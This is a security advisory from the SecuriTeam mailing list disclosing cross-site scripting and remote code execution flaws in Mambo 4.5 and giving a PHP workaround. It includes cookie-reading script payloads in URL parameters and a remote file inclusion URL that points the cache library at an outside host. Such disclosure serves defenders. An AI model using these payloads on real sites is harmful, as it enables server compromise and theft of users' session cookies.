The following security advisory is sent to the securiteam mailing list, and can
be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
Mambo Remote Code Execution And Cross Site Scripting
------------------------------------------------------------------------
SUMMARY
<http://www.mamboserver.com/> Mambo open source "is the finest open
source Web Content Management System available today - Mambo Open Source
makes communicating via the Web easy". The product has been found to
contain multiple security vulnerabilities that would allow a remote user
to compromise the system.
A certain condition exists in Mambo server which allows a remote attacker
to execute code remotely from the function cache.
DETAILS
Vulnerable Systems:
* Mambo server version 4.5 (1.0.9)
The index.php script can be used in a cross site scripting attack due to
insufficient filtering of the Itemid, mosmsg and limit variables. Some
examples:
http://<site-with-mambo>/index.php?option=com_content&task=view&id=18&Itemid=39"><script>alert(document.cookie)</script>&mosmsg=<h1>Hi,
%20I%20am%20an%20XSS%20Problem</h1><br><br><br><br><br><br><br><br><br><br><br><br><br><br>
http://<site-with-mambo>/index.php?option=com_content&task=view&id=15&Itemid=2&limit=1"><script>alert(document.cookie)</script>&limitstart=1
Another vulnerability is a simple hack made to the cache library which
enables remote code execution. Example:
http://<site-with-mambo>/includes/Cache/Lite/Function.php?mosConfig_absolute_path=http://fucking.site.com/
Workaround
The file mambo/includes/Cache/Lite/Function.php looks something like:
<?php
/**
* This class extends Cache_Lite and can be
used to cache the result and output of
functions/methods
*
* This class is completly inspired from
Sebastian Bergmann's
* PEAR/Cache_Function class. This is only an
adaptation to
* Cache_Lite
*
* There are some examples in the
'docs/examples' file
* Technical choices are described in the
'docs/technical' file
*
* @package Cache_Lite
* @version $Id: Function.php,v 1.1 2004/07/21
13:38:58 rcastley Exp $
* @author Sebastian BERGMANN
<sb@sebastian-bergmann.de>
* @author Fabien MARTY <fab@php.net>
*/
require_once($mosConfig_absolute_path .
'/includes/Cache/Lite.php');
class Cache_Lite_Function extends Cache_Lite
..
Simply add the following 2 lines before the require_once statement:
/** ensure this file is being included by a parent
file */
defined( '_VALID_MOS' ) or die( 'Direct Access to
this location is not allowed.' );
Patch Availability:
There is a fix for the issues mentioned above in the CVS version of the
product. It should be available in the next release.
ADDITIONAL INFORMATION
The information has been provided by <mailto:joxeankoret@yahoo.es> Joxean
Koret.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to:
list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to:
list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any
kind.
In no event shall we be liable for any damages whatsoever including direct,
indirect, incidental, consequential, loss of business profits or special
damages.
